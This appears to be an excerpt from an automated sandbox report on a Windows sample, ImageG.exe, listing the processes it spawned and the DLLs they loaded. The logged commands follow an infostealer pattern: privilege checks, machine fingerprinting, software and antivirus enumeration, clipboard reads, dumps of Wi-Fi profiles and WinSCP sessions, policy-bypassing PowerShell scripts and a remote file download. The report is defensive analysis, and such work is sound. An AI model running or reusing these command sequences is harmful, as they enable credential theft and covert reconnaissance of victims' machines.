        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: unknown unknownJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: unknown unknownJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic process where processid=7896 get ExecutablePath
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe NET SESSION
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://i.imgflip.com/472b3c.jpg', 'C:\Users\user\AppData\Local\Temp\error.jpg')"
        Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 SESSION
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Cryptography" /v MachineGuid
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\user\AppData\Local\Temp\error_script.ps1"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /C:"Detected boot environment" "C:\Windows\Panther\setupact.log"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Cryptography" /v MachineGuid
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\HomeBusiness2019Retail - en-us"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft Edge"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /C:"Detected boot environment" "C:\Windows\Panther\setupact.log"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 91.0.1 (x64 en-GB)"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6798C408-2636-448C-8AC6-F4E341102D27}"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7B981965-2FBC-433C-B4B3-E183EE97CD29}"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{B652B695-C849-4EF2-B09A-72771C7AD2BA}"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO CSV /NH
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct | Format-List displayName, instanceGuid, pathToSignedProductExe, pathToSignedReportingExe, productState, timestamp"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\user\AppData\Local\Temp\RpfMwk5hAFqJ_tezmp.ps1"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-subproc-heap-profiling --field-trial-handle=2232,i,12830479303068342978,11409588197743530798,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=2248 /prefetch:3
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Users\user\Desktop\ImageG.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\ImageG.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\ImageG.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\ImageG.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\ImageG.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\ImageG.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\Desktop\ImageG.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\ImageG.exeSection loaded: oleacc.dllJump to behavior
        Source: C:\Users\user\Desktop\ImageG.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\ImageG.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\ImageG.exeSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\Desktop\ImageG.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\ImageG.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\ImageG.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\ImageG.exeSection loaded: iconcodecservice.dllJump to behavior
        Source: C:\Users\user\Desktop\ImageG.exeSection loaded: windowscodecs.dllJump to behavior
        Source: C:\Users\user\Desktop\ImageG.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Users\user\Desktop\ImageG.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\ImageG.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
        Source: C:\Users\user\Desktop\ImageG.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\ImageG.exeSection loaded: ntshrui.dllJump to behavior
        Source: C:\Users\user\Desktop\ImageG.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\ImageG.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: ffmpeg.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: dbghelp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: dwrite.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: kbdus.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: dxgi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: windows.ui.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: windowmanagementapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: inputhost.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: twinapi.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: twinapi.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: wtsapi32.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: winsta.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: mscms.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: coloradapterclient.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: mmdevapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: devobj.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: napinsp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: pnrpnsp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: wshbth.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: winrnr.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: resourcepolicyclient.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: quartz.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: qcap.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: devenum.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: msdmo.dllJump to behavior
        Source: C:\Windows\System32\dllhost.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\dllhost.exeSection loaded: edgegdi.dll
        Source: C:\Windows\System32\dllhost.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\dllhost.exeSection loaded: thumbcache.dll
        Source: C:\Windows\System32\dllhost.exeSection loaded: propsys.dll
        Source: C:\Windows\System32\dllhost.exeSection loaded: photometadatahandler.dll
        Source: C:\Windows\System32\dllhost.exeSection loaded: windowscodecs.dll
        Source: C:\Windows\System32\dllhost.exeSection loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\System32\dllhost.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\dllhost.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\dllhost.exeSection loaded: windows.staterepositoryps.dll
        Source: C:\Windows\System32\dllhost.exeSection loaded: wintypes.dll
        Source: C:\Windows\System32\dllhost.exeSection loaded: apphelp.dll
        Source: C:\Windows\System32\dllhost.exeSection loaded: mfsrcsnk.dll
        Source: C:\Windows\System32\dllhost.exeSection loaded: mfplat.dll
        Source: C:\Windows\System32\dllhost.exeSection loaded: rtworkq.dll
        Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
        Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: edgegdi.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: ffmpeg.dll
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: dbghelp.dll
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: winmm.dll
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: iphlpapi.dll
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: userenv.dll
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: version.dll
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: dwrite.dll
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: secur32.dll
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: winhttp.dll
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: dhcpcsvc.dll
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: sspicli.dll
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: powrprof.dll
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: umpdc.dll
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: edgegdi.dll
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: mswsock.dll
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: kernel.appcore.dll
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: dxgi.dll
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: resourcepolicyclient.dll
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: cryptbase.dll
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: mf.dll
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: mfplat.dll
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: rtworkq.dll
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: dwmapi.dll
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: d3d11.dll
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: dcomp.dll
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeSection loaded: ncrypt.dll
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe  Section loaded: ntasn1.dll
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe  Section loaded: dxcore.dll
        Source: C:\Windows\System32\net.exe  Section loaded: mpr.dll
        Source: C:\Windows\System32\net.exe  Section loaded: wkscli.dll
        Source: C:\Windows\System32\net.exe  Section loaded: netutils.dll
        Source: C:\Windows\System32\net.exe  Section loaded: samcli.dll
        Source: C:\Windows\System32\net.exe  Section loaded: srvcli.dll
        Source: C:\Windows\System32\net.exe  Section loaded: iphlpapi.dll
        Source: C:\Windows\System32\net1.exe  Section loaded: samcli.dll
        Source: C:\Windows\System32\net1.exe  Section loaded: netutils.dll
        Source: C:\Windows\System32\net1.exe  Section loaded: dsrole.dll
        Source: C:\Windows\System32\net1.exe  Section loaded: srvcli.dll
        Source: C:\Windows\System32\net1.exe  Section loaded: wkscli.dll
        Source: C:\Windows\System32\net1.exe  Section loaded: logoncli.dll
        Source: C:\Windows\System32\net1.exe  Section loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: edgegdi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rsaenh.dll
